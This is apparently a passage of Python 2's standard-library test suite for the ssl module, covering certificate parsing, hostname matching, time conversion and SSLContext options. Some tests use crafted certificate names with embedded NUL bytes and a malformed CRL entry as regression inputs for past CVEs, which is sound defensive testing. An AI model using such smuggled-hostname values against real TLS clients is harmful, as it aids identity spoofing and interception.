OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
    """Write the currently handled exception's traceback to stdout,
    preceded by *prefix*, when the test suite runs verbosely."""
    exc_type, exc_value, exc_tb = sys.exc_info()
    formatted = ' '.join(traceback.format_exception(exc_type, exc_value, exc_tb))
    if support.verbose:
        sys.stdout.write(prefix + formatted)
class BasicTests(unittest.TestCase):
    """Smoke tests for the legacy Python 2 ``ssl.sslwrap_simple`` API."""

    def test_sslwrap_simple(self):
        # A crude test for the legacy API
        try:
            ssl.sslwrap_simple(socket.socket(socket.AF_INET))
        except IOError, e:
            # errno 32 == EPIPE
            if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise
        try:
            # also accepts the raw _socket.socket wrapped by socket.socket
            ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
        except IOError, e:
            if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise
def can_clear_options():
    """Whether SSLContext options can be cleared (OpenSSL 0.9.8m or higher)."""
    minimum = (0, 9, 8, 13, 15)
    return not (ssl._OPENSSL_API_VERSION < minimum)
def no_sslv2_implies_sslv3_hello():
    """Whether disabling SSLv2 still sends an SSLv3 hello (OpenSSL 0.9.7h+)."""
    version = ssl.OPENSSL_VERSION_INFO
    return version >= (0, 9, 7, 8, 15)
def have_verify_flags():
    """Whether SSLContext.verify_flags is usable (OpenSSL 0.9.8 or higher)."""
    required = (0, 9, 8, 0, 15)
    return ssl.OPENSSL_VERSION_INFO >= required
def utc_offset(): #NOTE: ignore issues like #1647654
    """Return the local UTC offset in seconds (local time = utc time + offset)."""
    dst_active = time.daylight and time.localtime().tm_isdst > 0
    return -time.altzone if dst_active else -time.timezone
def asn1time(cert_time):
    """Normalize *cert_time* to the form ASN1_TIME_print() produces.

    Some OpenSSL versions ignore the seconds field (see #18207), and the
    day-of-month is padded with a space rather than strftime's zero.
    """
    # 0.9.8i zeroes the seconds; mirror that so comparisons succeed there.
    if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
        fmt = "%b %d %H:%M:%S %Y GMT"
        parsed = datetime.datetime.strptime(cert_time, fmt)
        cert_time = parsed.replace(second=0).strftime(fmt)
    # %d adds leading zero but ASN1_TIME_print() uses leading space
    if cert_time[4] == "0":
        cert_time = cert_time[:4] + " " + cert_time[5:]
    return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    """Decorator skipping *func* on Ubuntu's patched OpenSSL builds,
    which make SSLv2 contexts unusable."""
    # Without SSLv2 support there is nothing to probe; pass through.
    if not hasattr(ssl, 'PROTOCOL_SSLv2'):
        return func

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        try:
            ssl.SSLContext(ssl.PROTOCOL_SSLv2)
        except ssl.SSLError:
            if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
                raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
        return func(*args, **kwargs)
    return wrapper
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
    """Tests for ssl module constants, certificate parsing/matching and
    utility functions; no TLS handshake with a live peer is performed."""

    def test_constants(self):
        # Merely referencing the names checks they are exported.
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        ssl.OP_CIPHER_SERVER_PREFERENCE
        ssl.OP_SINGLE_DH_USE
        if ssl.HAS_ECDH:
            ssl.OP_SINGLE_ECDH_USE
        if ssl.OPENSSL_VERSION_INFO >= (1, 0):
            ssl.OP_NO_COMPRESSION
        self.assertIn(ssl.HAS_SNI, {True, False})
        self.assertIn(ssl.HAS_ECDH, {True, False})
        ssl.OP_NO_SSLv2
        ssl.OP_NO_SSLv3
        ssl.OP_NO_TLSv1
        ssl.OP_NO_TLSv1_3
        if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
            ssl.OP_NO_TLSv1_1
            ssl.OP_NO_TLSv1_2

    def test_random(self):
        """RAND_* helpers are callable and reject bad arguments."""
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))
        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        ssl.RAND_add("this is a random string", 75.0)

    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['issuer'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                         )
        # Note the next three asserts will fail if the keys are regenerated
        self.assertEqual(p['notAfter'], asn1time('Aug 26 14:23:15 2028 GMT'))
        self.assertEqual(p['notBefore'], asn1time('Aug 29 14:23:15 2018 GMT'))
        self.assertEqual(p['serialNumber'], '98A7CF88C74A32ED')
        self.assertEqual(p['subject'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                         )
        self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                         )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))

    def test_parse_cert_CVE_2019_5010(self):
        # A cert with a malformed CRL distribution point must still decode.
        p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(
            p,
            {
                'issuer': (
                    (('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
                'notAfter': 'Jun 14 18:00:58 2028 GMT',
                'notBefore': 'Jun 18 18:00:58 2018 GMT',
                'serialNumber': '02',
                'subject': ((('countryName', 'UK'),),
                            (('commonName',
                              'codenomicon-vm-2.test.lal.cisco.com'),)),
                'subjectAltName': (
                    ('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
                'version': 3
            }
        )

    def test_parse_cert_CVE_2013_4238(self):
        # Embedded NUL bytes in names must be preserved, not truncated.
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))
        self.assertEqual(p['subjectAltName'], san)

    def test_parse_all_sans(self):
        # ALLSANFILE carries one of every supported subjectAltName kind.
        p = ssl._ssl._test_decode_cert(ALLSANFILE)
        self.assertEqual(p['subjectAltName'],
                         (
                             ('DNS', 'allsans'),
                             ('othername', '<unsupported>'),
                             ('othername', '<unsupported>'),
                             ('email', 'user@example.org'),
                             ('DNS', 'www.example.org'),
                             ('DirName',
                              ((('countryName', 'XY'),),
                               (('localityName', 'Castle Anthrax'),),
                               (('organizationName', 'Python Software Foundation'),),
                               (('commonName', 'dirname example'),))),
                             ('URI', 'https://www.python.org/'),
                             ('IP Address', '127.0.0.1'),
                             ('IP Address', '0:0:0:0:0:0:0:1\n'),
                             ('Registered ID', '1.2.3.4.5')
                         )
                         )

    def test_DER_to_PEM(self):
        """PEM -> DER -> PEM round-trips and keeps the header/footer."""
        with open(CAFILE_CACERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)

    def test_openssl_version(self):
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, (int, long))
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if IS_LIBRESSL:
            self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
                            (s, t, hex(n)))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t))

    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        del ss
        self.assertEqual(wr(), None)

    def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # socket.error raise by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            self.assertRaises(socket.error, ss.recv, 1)
            self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
            self.assertRaises(socket.error, ss.recvfrom, 1)
            self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
            self.assertRaises(socket.error, ss.send, b'x')
            self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
            self.assertRaises(NotImplementedError, ss.dup)

    def test_timeout(self):
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            with closing(ssl.wrap_socket(s)) as ss:
                self.assertEqual(timeout, ss.gettimeout())

    def test_errors(self):
        """wrap_socket argument validation and missing-file errors."""
        sock = socket.socket()
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified",
                                ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified for server-side operations",
                                ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified for server-side operations",
                                ssl.wrap_socket, sock, server_side=True, certfile="")
        with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
            self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
                                    s.connect, (HOST, 8080))
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock,
                                certfile=CERTFILE, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock,
                                certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)

    def bad_cert_test(self, certfile):
        """Check that trying to use the given client certificate fails"""
        certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
                                certfile)
        sock = socket.socket()
        self.addCleanup(sock.close)
        with self.assertRaises(ssl.SSLError):
            ssl.wrap_socket(sock,
                            certfile=certfile,
                            ssl_version=ssl.PROTOCOL_TLSv1)

    def test_empty_cert(self):
        """Wrapping with an empty cert file"""
        self.bad_cert_test("nullcert.pem")

    def test_malformed_cert(self):
        """Wrapping with a badly formatted certificate (syntax error)"""
        self.bad_cert_test("badcert.pem")

    def test_malformed_key(self):
        """Wrapping with a badly formatted key (syntax error)"""
        self.bad_cert_test("badkey.pem")

    def test_match_hostname(self):
        """Exercise ssl.match_hostname against CN, SAN and wildcard rules."""
        def ok(cert, hostname):
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)

        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')
        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')
        # only match one left-most wildcard
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')
        # NULL bytes are bad, CVE-2013-4073
        cert = {'subject': ((('commonName',
                              'null.python.org\x00example.org'),),)}
        ok(cert, 'null.python.org\x00example.org') # or raise an error?
        fail(cert, 'example.org')
        fail(cert, 'null.python.org')
        # error cases with wildcards
        cert = {'subject': ((('commonName', '*.*.a.com'),),)}
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')
        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        fail(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')
        # wildcard doesn't match IDNA prefix 'xn--'
        idna = u'püthon.python.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, idna)
        cert = {'subject': ((('commonName', 'x*.python.org'),),)}
        fail(cert, idna)
        cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
        fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in sequent fragments
        # are supported.
        idna = u'www*.pythön.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
        ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')
        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')
        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')
        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')
        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')
        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
        # Issue #17980: avoid denials of service by refusing more than one
        # wildcard per fragment.
        cert = {'subject': ((('commonName', 'a*b.com'),),)}
        ok(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b.co*'),),)}
        fail(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b*.com'),),)}
        with self.assertRaises(ssl.CertificateError) as cm:
            ssl.match_hostname(cert, 'axxbxxc.com')
        self.assertIn("too many wildcards", str(cm.exception))

    def test_server_side(self):
        # server_hostname doesn't work for server sockets
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with closing(socket.socket()) as sock:
            self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
                              server_hostname="some.hostname")

    def test_unknown_channel_binding(self):
        # should raise ValueError for unknown type
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            with self.assertRaises(ValueError):
                ss.get_channel_binding("unknown-type")

    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        # unconnected should return None for known type
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))
        # the same for server-side
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))

    def test_get_default_verify_paths(self):
        paths = ssl.get_default_verify_paths()
        self.assertEqual(len(paths), 6)
        self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
        # The SSL_CERT_* environment variables override the defaults.
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            paths = ssl.get_default_verify_paths()
            self.assertEqual(paths.cafile, CERTFILE)
            self.assertEqual(paths.capath, CAPATH)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_certificates(self):
        self.assertTrue(ssl.enum_certificates("CA"))
        self.assertTrue(ssl.enum_certificates("ROOT"))
        self.assertRaises(TypeError, ssl.enum_certificates)
        self.assertRaises(WindowsError, ssl.enum_certificates, "")
        trust_oids = set()
        for storename in ("CA", "ROOT"):
            store = ssl.enum_certificates(storename)
            self.assertIsInstance(store, list)
            for element in store:
                self.assertIsInstance(element, tuple)
                self.assertEqual(len(element), 3)
                cert, enc, trust = element
                self.assertIsInstance(cert, bytes)
                self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
                self.assertIsInstance(trust, (set, bool))
                if isinstance(trust, set):
                    trust_oids.update(trust)
        serverAuth = "1.3.6.1.5.5.7.3.1"
        self.assertIn(serverAuth, trust_oids)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_crls(self):
        self.assertTrue(ssl.enum_crls("CA"))
        self.assertRaises(TypeError, ssl.enum_crls)
        self.assertRaises(WindowsError, ssl.enum_crls, "")
        crls = ssl.enum_crls("CA")
        self.assertIsInstance(crls, list)
        for element in crls:
            self.assertIsInstance(element, tuple)
            self.assertEqual(len(element), 2)
            self.assertIsInstance(element[0], bytes)
            self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})

    def test_asn1object(self):
        """_ASN1Object lookups by OID, NID and name agree with each other."""
        expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                    '1.3.6.1.5.5.7.3.1')
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertEqual(val, expected)
        self.assertEqual(val.nid, 129)
        self.assertEqual(val.shortname, 'serverAuth')
        self.assertEqual(val.longname, 'TLS Web Server Authentication')
        self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
        val = ssl._ASN1Object.fromnid(129)
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
        with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
            ssl._ASN1Object.fromnid(100000)
        for i in range(1000):
            try:
                obj = ssl._ASN1Object.fromnid(i)
            except ValueError:
                pass
            else:
                self.assertIsInstance(obj.nid, int)
                self.assertIsInstance(obj.shortname, str)
                self.assertIsInstance(obj.longname, str)
                self.assertIsInstance(obj.oid, (str, type(None)))
        val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
        self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
                         expected)
        with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
            ssl._ASN1Object.fromname('serverauth')

    def test_purpose_enum(self):
        """ssl.Purpose members map to the expected ASN.1 objects."""
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
        self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
                         '1.3.6.1.5.5.7.3.1')
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
        self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
                         '1.3.6.1.5.5.7.3.2')

    def test_unsupported_dtls(self):
        # Datagram sockets can't be wrapped by either API.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        with self.assertRaises(NotImplementedError) as cx:
            ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with self.assertRaises(NotImplementedError) as cx:
            ctx.wrap_socket(s)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")

    def cert_time_ok(self, timestring, timestamp):
        # Helper: cert_time_to_seconds(timestring) must equal timestamp.
        self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)

    def cert_time_fail(self, timestring):
        # Helper: cert_time_to_seconds(timestring) must raise ValueError.
        with self.assertRaises(ValueError):
            ssl.cert_time_to_seconds(timestring)

    @unittest.skipUnless(utc_offset(),
                         'local time needs to be different from UTC')
    def test_cert_time_to_seconds_timezone(self):
        # Issue #19940: ssl.cert_time_to_seconds() returns wrong
        # results if local timezone is not UTC
        self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
        self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)

    def test_cert_time_to_seconds(self):
        timestring = "Jan 5 09:34:43 2018 GMT"
        ts = 1515144883.0
        self.cert_time_ok(timestring, ts)
        # accept keyword parameter, assert its name
        self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
        # accept both %e and %d (space or zero generated by strftime)
        self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
        # case-insensitive
        self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
        self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
        self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
        self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
        self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
        self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
        self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
        self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
        newyear_ts = 1230768000.0
        # leap seconds
        self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
        # same timestamp
        self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
        self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
        # allow 60th second (even if it is not a leap second)
        self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
        # allow 2nd leap second for compatibility with time.strptime()
        self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
        self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatement for the special value:
        # 99991231235959Z (rfc 5280)
        self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)

    @support.run_with_locale('LC_ALL', '')
    def test_cert_time_to_seconds_locale(self):
        # `cert_time_to_seconds()` should be locale independent
        def local_february_name():
            return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
        if local_february_name().lower() == 'feb':
            self.skipTest("locale-specific month name needs to be "
                          "different from C locale")
        # locale-independent
        self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
        self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        """SSLContext accepts every known protocol and rejects bad values."""
        for protocol in PROTOCOLS:
            ssl.SSLContext(protocol)
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)
    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        """The protocol attribute reflects the constructor argument."""
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)
    def test_ciphers(self):
        """set_ciphers accepts valid lists and rejects an unmatchable one."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")
    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        """Default SSLContext options, and setting/clearing option bits."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
        default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
        # SSLContext also enables these by default
        default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
                    OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
                    OP_ENABLE_MIDDLEBOX_COMPAT)
        self.assertEqual(default, ctx.options)
        ctx.options |= ssl.OP_NO_TLSv1
        self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
        if can_clear_options():
            ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
            self.assertEqual(default, ctx.options)
            ctx.options = 0
            # Ubuntu has OP_NO_SSLv3 forced on by default
            self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0
